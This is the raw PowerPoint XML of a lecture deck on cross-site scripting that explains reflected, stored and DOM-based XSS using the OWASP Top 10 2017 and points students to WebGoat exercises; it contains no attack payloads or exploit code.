          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275698" y="6333816"/>
            <a:ext cx="2428870" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://excess-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="328424035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What makes DOM-based XSS different?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1391357"/>
            <a:ext cx="8378371" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" dirty="0" smtClean="0"/>
              <a:t>In Reflected XSS attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>the server inserts the malicious script into the page, which is then sent in a response to the victim. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>When the victim’s browser receives the response, it assumes the malicious script to be part of the page’s legitimate content and automatically executes it during page load.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" dirty="0" smtClean="0"/>
              <a:t>In DOM-based XSS attacks:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>the only script that is automatically executed during page load is a legitimate part of the page. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The script makes use of user input to add HTML to the page. The script is executed at the client side.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275698" y="6333816"/>
            <a:ext cx="2428870" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://excess-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178749003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Why DOM-based XSS matters</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1391357"/>
            <a:ext cx="8378371" cy="2154436"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>An increasing amount of HTML is generated by JavaScript on the client side rather than by the server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Any time content needs to be changed without refreshing the entire page, the update must be performed using JavaScript (AJAX request)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="3696480"/>
            <a:ext cx="8378371" cy="2431435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Vulnerabilities can be present not only in your website’s server-side code, but also in your website’s client-side JavaScript code. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>the client-side code might still unsafely include user input in a DOM update after the page has loaded.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275698" y="6333816"/>
            <a:ext cx="2428870" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://excess-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40021564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A7:2017 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" b="1" dirty="0" smtClean="0"/>
              <a:t> Cross Site Sripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2616332"/>
            <a:ext cx="9144000" cy="18639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shot 2019-04-11 at 00.35.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0373"/>
            <a:ext cx="9144000" cy="2879950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2785089"/>
            <a:ext cx="9144000" cy="18639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84150" y="6337609"/>
            <a:ext cx="8959850" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/images/7/72/OWASP_Top_10-2017_%28en%29.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pdf.pdfc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38463210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A7:2017 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" b="1" dirty="0" smtClean="0"/>
              <a:t> Cross Site Sripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2616332"/>
            <a:ext cx="9144000" cy="18639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shot 2019-04-11 at 00.35.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0373"/>
            <a:ext cx="9144000" cy="2879950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2760133" y="2802022"/>
            <a:ext cx="6417733" cy="18639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84150" y="6337609"/>
            <a:ext cx="8959850" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/images/7/72/OWASP_Top_10-2017_%28en%29.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pdf.pdfc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342021285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A7:2017 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" b="1" dirty="0" smtClean="0"/>
              <a:t> Cross Site Sripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2616332"/>
            <a:ext cx="9144000" cy="18639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shot 2019-04-11 at 00.35.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0373"/>
            <a:ext cx="9144000" cy="2879950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6485467" y="2802022"/>
            <a:ext cx="2692399" cy="18639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84150" y="6337609"/>
            <a:ext cx="8959850" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/images/7/72/OWASP_Top_10-2017_%28en%29.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pdf.pdfc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35211146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XSS Scenario</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="downloa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495" y="1501273"/>
            <a:ext cx="1391430" cy="1391430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772495" y="2892703"/>
            <a:ext cx="1391430" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5757333" y="2523371"/>
            <a:ext cx="2150534" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web Application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="downlo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2495" y="4040715"/>
            <a:ext cx="1293283" cy="1293283"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772495" y="5333998"/>
            <a:ext cx="1391430" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5892801" y="3116038"/>
            <a:ext cx="660400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5909733" y="3856049"/>
            <a:ext cx="1270000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524929" y="6306231"/>
            <a:ext cx="8805333" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.youtube.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>watch?v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=IuzU4y-UjLw&amp;feature=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>youtu.be</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5757333" y="2892703"/>
            <a:ext cx="2150534" cy="1933298"/>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5548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A7:2017 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" b="1" dirty="0" smtClean="0"/>
              <a:t> Cross Site Sripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2616332"/>
            <a:ext cx="9144000" cy="18639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shot 2019-04-11 at 00.35.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0373"/>
            <a:ext cx="9144000" cy="2879950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="184150" y="6337609"/>
            <a:ext cx="8959850" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/images/7/72/OWASP_Top_10-2017_%28en%29.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pdf.pdfc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="184149" y="4583282"/>
            <a:ext cx="8130117" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The need for an external delivery mechanism for the attack means that the impact of reflected XSS is generally less severe than stored XSS, where a self-contained attack can be delivered within the vulnerable application itself.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="259221048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x-none" b="1" dirty="0" smtClean="0"/>
              <a:t>Hand-On Experience</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="x-none" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="x-none" b="1" dirty="0" smtClean="0"/>
              <a:t>(WebGoat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" b="1" dirty="0" smtClean="0"/>
              <a:t> Cross Site Scripting )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10370242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Part 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1188161"/>
            <a:ext cx="8378371" cy="1446550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Try to execute JavaScript code using</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The browser address bar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Any input data field</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="266037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Part 6-8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="3762033"/>
            <a:ext cx="8378371" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Review reflected XSS attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Try It!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
